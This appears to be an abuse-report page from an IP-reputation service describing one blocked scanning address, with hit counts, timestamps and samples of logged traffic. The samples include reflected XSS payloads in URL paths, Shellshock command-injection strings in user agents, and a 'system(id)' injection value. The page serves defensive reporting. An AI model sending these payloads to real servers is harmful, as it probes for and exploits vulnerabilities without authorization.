abuseip.org
- Reason
- suspicious paths across 1 domains
- Hits (last hour)
- 135
- Unique targets hit
- 1
- Unique paths probed
- 2,521
- Detection count
- 17
- First seen
- 2026-06-26 07:41:33 UTC
- Last seen
- 2026-06-26 07:51:15 UTC
- Block expires
- 2026-06-27 08:43:44 UTC
Sample paths probed
- /index.jsf?autoScroll=0%2c275%29%3b%2f%2f--%3e%3c%2fscript%3e%3cscript%3ealert%28%27myfaces_tomahawk_autoscroll_xss.nasl%27
- /home.jsf?autoScroll=0%2c275%29%3b%2f%2f--%3e%3c%2fscript%3e%3cscript%3ealert%28%27myfaces_tomahawk_autoscroll_xss.nasl%27
- /scripts/activatemember?activatecode=&member=%22%3e%3cscript%3ealert%28%27mvnforum_activatemember_xss.nasl%27%29%3c%2fscript%3e
- /cgi-bin/search=%3Cscript%3Ealert('XSS')%3C/script%3E
- /session/login.php?dest=nessus%22%3e%3cscript%3ealert%28%27ossim_dest_xss.nasl%27%29%3c%2fscript%3e%3c%21--%20
- /activatemember?activatecode=&member=%22%3e%3cscript%3ealert%28%27mvnforum_activatemember_xss.nasl%27%29%3c%2fscript%3e
- /dana/fb/smbswsrv.cgi?wg=<script>foo</script>
- /cgi-binswsrv.cgi?wg=<script>foo</script>
- /cgi-bin/activatemember?activatecode=&member=%22%3e%3cscript%3ealert%28%27mvnforum_activatemember_xss.nasl%27%29%3c%2fscript%3e
- /index.aspx
- /scriptsswsrv.cgi?wg=<script>foo</script>
- /examples/jsp/cal/cal2.jsp?time=%3cscript%3ealert%28%27orion_examples_xss.nasl%27%29%3c%2fscript%3e
- /swsrv.cgi?wg=<script>foo</script>
- /cgi-bin/session/login.php?dest=nessus%22%3e%3cscript%3ealert%28%27ossim_dest_xss.nasl%27%29%3c%2fscript%3e%3c%21--%20
- /forum/activatemember?activatecode=&member=%22%3e%3cscript%3ealert%28%27mvnforum_activatemember_xss.nasl%27%29%3c%2fscript%3e
- /Default.aspx
- /mvnforum/activatemember?activatecode=&member=%22%3e%3cscript%3ealert%28%27mvnforum_activatemember_xss.nasl%27%29%3c%2fscript%3e
- /scripts/session/login.php?dest=nessus%22%3e%3cscript%3ealert%28%27ossim_dest_xss.nasl%27%29%3c%2fscript%3e%3c%21--%20
- /LoginPage.do
- /examples/jsp/checkbox/checkresult.jsp?fruit=%3cscript%3ealert%28%27orion_examples_xss.nasl%27%29%3c%2fscript%3e
Sample User-Agents
- Jakarta Commons-HttpClient/2.0final
- "; system(id);#
- () { ignored; }; echo Content-Type: text/plain ; echo ; echo "bash_cve_2014_6271_rce Output : $((31+26))"
- () { _; } >_[$($())] { echo Content-Type: text/plain ; echo ; echo "bash_cve_2014_6278 Output : $((31+4))"; }
- Python/3.12 aiohttp/3.13.5
- python-requests/2.34.2
- () { _; } >_[$($())] { echo Content-Type: text/plain ; echo ; echo "bash_cve_2014_6278 Output : $((93+18))"; }
- () { ignored; }; echo Content-Type: text/plain ; echo ; echo "bash_cve_2014_6271_rce Output : $((29+71))"
- mercuryboard_user_agent_sql_injection.nasl'
- Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
- Fastream NETFile Server
- () { _; } >_[$($())] { echo; /bin/sleep 5; }
- () { ignored; }; /bin/sleep 5;
What does this mean?
This address sent traffic that the redirs.com edge classified as automated abuse โ typically WordPress/PHP exploit scanning, credential file probing (.env, .git, .aws/), or mass-domain enumeration. The block is automatic and time-limited (24 hours from last detection).
If you believe this is a false positive, contact [email protected] with the IP and the timestamps above.